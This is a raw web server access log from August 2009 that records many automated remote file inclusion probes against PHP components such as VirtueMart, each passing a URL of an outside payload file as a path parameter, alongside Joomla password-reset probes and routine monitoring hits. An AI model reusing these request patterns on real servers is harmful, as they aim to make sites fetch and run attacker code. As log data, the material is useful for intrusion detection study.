79.233.81.134 - - [02/Aug/2009:03:27:38 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322)"
69.175.2.122 - - [02/Aug/2009:03:27:39 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.55.179.121 - - [02/Aug/2009:03:28:13 -0400] "GET /logs/access_log.Q109052900%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
72.55.179.121 - - [02/Aug/2009:03:28:17 -0400] "GET /logs/access_log.Q109052700%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
72.55.179.121 - - [02/Aug/2009:03:28:24 -0400] "GET /logs/access_log.Q109052900%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
72.55.179.121 - - [02/Aug/2009:03:28:24 -0400] "GET /logs/access_log.Q109052700%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
210.218.5.234 - - [02/Aug/2009:03:29:34 -0400] "GET /logs//hotel/cms_1//redsys/=http://es.bnue.ac.kr/upload/popup/id1?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
210.218.5.234 - - [02/Aug/2009:03:29:34 -0400] "GET //hotel/cms_1//redsys/=http://es.bnue.ac.kr/upload/popup/id1?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
210.218.5.234 - - [02/Aug/2009:03:29:34 -0400] "GET /logs/access_log.Q109060600//hotel/cms_1//redsys/=http://es.bnue.ac.kr/upload/popup/id1?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
210.218.5.234 - - [02/Aug/2009:03:29:39 -0400] "GET /logs/error_log.Q109060600//hotel/cms_1//redsys/=http://es.bnue.ac.kr/upload/popup/id1?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
77.221.130.15 - - [02/Aug/2009:03:30:11 -0400] "GET /logs/access_log.Q109061200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/omilaid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
77.221.130.15 - - [02/Aug/2009:03:30:12 -0400] "GET /logs/access_log.Q109061200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/omilaid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
77.221.130.15 - - [02/Aug/2009:03:30:16 -0400] "GET /logs/access_log.Q109061200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/omilaid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
65.111.165.164 - - [02/Aug/2009:03:30:16 -0400] "GET /logs/access_log.Q109060300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:30:17 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:30:17 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
77.221.130.15 - - [02/Aug/2009:03:30:17 -0400] "GET /logs/access_log.Q109061200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/omilaid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
206.123.107.13 - - [02/Aug/2009:03:31:16 -0400] "GET /logs/access_log.Q109052900%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
206.123.107.13 - - [02/Aug/2009:03:31:24 -0400] "GET /logs/access_log.Q109052700%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:03:31:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.111.165.164 - - [02/Aug/2009:03:31:56 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:31:56 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:31:56 -0400] "GET /logs/access_log.Q109072700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:32:24 -0400] "GET /logs/access_log.Q109060300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:32:54 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:32:54 -0400] "GET /logs/access_log.Q109070100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:32:54 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:32:58 -0400] "GET /logs/access_log.Q109060100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:03:33:02 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
163.24.136.10 - - [02/Aug/2009:03:33:02 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:33:34 -0400] "GET /logs/access_log.Q109072700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
61.222.190.185 - - [02/Aug/2009:03:34:20 -0400] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
61.222.190.185 - - [02/Aug/2009:03:34:20 -0400] "GET /logs/access_log.Q109062800/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 278 "-" "libwww-perl/5.803"
91.192.37.223 - - [02/Aug/2009:03:34:25 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.192.37.223 - - [02/Aug/2009:03:34:25 -0400] "GET /logs/access_log.Q109070800//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.222.190.185 - - [02/Aug/2009:03:34:26 -0400] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
222.122.6.62 - - [02/Aug/2009:03:34:55 -0400] "GET /logs/access_log.Q109071600%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
222.122.6.62 - - [02/Aug/2009:03:34:55 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
222.122.6.62 - - [02/Aug/2009:03:34:55 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.boxkk.com/images/info.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
61.222.190.185 - - [02/Aug/2009:03:35:13 -0400] "GET /logs/access_log.Q109070700/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://carsplusmovies.com/wp-content/plugins/maintenance-mode/maintenance-mode.do??? HTTP/1.1" 404 278 "-" "libwww-perl/5.803"
209.59.12.99 - - [02/Aug/2009:03:36:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.15 - - [02/Aug/2009:03:36:40 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/omilaid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.15 - - [02/Aug/2009:03:36:40 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/omilaid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.15 - - [02/Aug/2009:03:36:40 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/omilaid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.15 - - [02/Aug/2009:03:36:42 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/omilaid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
65.111.165.164 - - [02/Aug/2009:03:36:51 -0400] "GET /logs/access_log.Q109060100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:36:51 -0400] "GET /logs/access_log.Q109070100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:03:37:14 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:03:37:14 -0400] "GET /logs/access_log.Q109060300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:03:37:14 -0400] "GET /logs/access_log.Q109052500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:03:37:14 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:37:31 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:37:31 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:37:35 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:37:35 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:37:35 -0400] "GET /logs/access_log.Q109053100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:37:35 -0400] "GET /logs/access_log.Q109053100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:03:37:38 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:03:37:38 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:03:37:38 -0400] "GET /logs/access_log.Q109052500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:03:37:38 -0400] "GET /logs/access_log.Q109060300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.71.201 - - [02/Aug/2009:03:38:14 -0400] "GET /logs/access_log.Q108111800 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.201.81.6 - - [02/Aug/2009:03:39:17 -0400] "GET /logs/access_log.Q109052500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:03:39:17 -0400] "GET /logs/access_log.Q109060300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:03:39:26 -0400] "GET /logs/access_log.Q109052500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:03:39:26 -0400] "GET /logs/access_log.Q109060300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:40:14 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:40:14 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:40:14 -0400] "GET /logs/access_log.Q109053100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:03:41:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.243.71 - - [02/Aug/2009:03:42:21 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:03:42:21 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:03:42:24 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:03:42:29 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:03:42:30 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:03:42:31 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:03:42:32 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.38.243.71 - - [02/Aug/2009:03:42:39 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.voyageclub.ru///files/jember/1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:46:04 -0400] "GET /logs/access_log.Q109053100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:46:05 -0400] "GET /logs/access_log.Q109053100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:46:09 -0400] "GET /logs/access_log.Q109053100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:03:46:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.161.196.26 - - [02/Aug/2009:03:49:35 -0400] "GET /logs/error_log.Q109050700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:49:48 -0400] "GET /logs/error_log.Q109050700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:03:51:01 -0400] "GET /logs/error_log.Q109050700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:03:51:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.150.78.235 - - [02/Aug/2009:03:55:37 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:03:55:37 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:03:55:37 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:03:55:49 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:56:23 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:56:23 -0400] "GET /logs/access_log.Q109060400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:56:24 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:03:56:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.111.165.164 - - [02/Aug/2009:03:56:56 -0400] "GET /logs/access_log.Q109051300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:57:11 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:57:11 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:57:11 -0400] "GET /logs/access_log.Q109052500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:57:11 -0400] "GET /logs/access_log.Q109060300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.150.78.235 - - [02/Aug/2009:03:57:52 -0400] "GET /logs/access_log.Q109062700///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:59:16 -0400] "GET /logs/access_log.Q109052500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:03:59:16 -0400] "GET /logs/access_log.Q109060300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
206.176.241.116 - - [02/Aug/2009:03:59:39 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.omegagold.net//skin_shop/standard/2_view_body/safe.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
206.176.241.116 - - [02/Aug/2009:03:59:40 -0400] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.omegagold.net//skin_shop/standard/2_view_body/safe.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
206.176.241.116 - - [02/Aug/2009:03:59:40 -0400] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.omegagold.net//skin_shop/standard/2_view_body/safe.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
201.80.7.120 - - [02/Aug/2009:04:00:12 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
201.80.7.120 - - [02/Aug/2009:04:01:00 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
206.176.241.116 - - [02/Aug/2009:04:02:48 -0400] "GET /logs/access_log.Q109070800//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.omegagold.net//skin_shop/standard/2_view_body/safe.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
201.80.7.120 - - [02/Aug/2009:04:02:49 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
65.111.165.164 - - [02/Aug/2009:04:03:04 -0400] "GET /logs/access_log.Q109060400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
65.111.165.164 - - [02/Aug/2009:04:03:05 -0400] "GET /logs/access_log.Q109051300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
206.123.107.13 - - [02/Aug/2009:04:03:12 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
206.123.107.13 - - [02/Aug/2009:04:03:12 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
206.123.107.13 - - [02/Aug/2009:04:03:16 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
206.123.107.13 - - [02/Aug/2009:04:03:17 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
201.80.7.120 - - [02/Aug/2009:04:03:17 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
201.80.7.120 - - [02/Aug/2009:04:03:19 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
81.176.226.164 - - [02/Aug/2009:04:03:24 -0400] "GET /logs/access_log.Q109053000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
81.176.226.164 - - [02/Aug/2009:04:03:24 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/tukulid.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
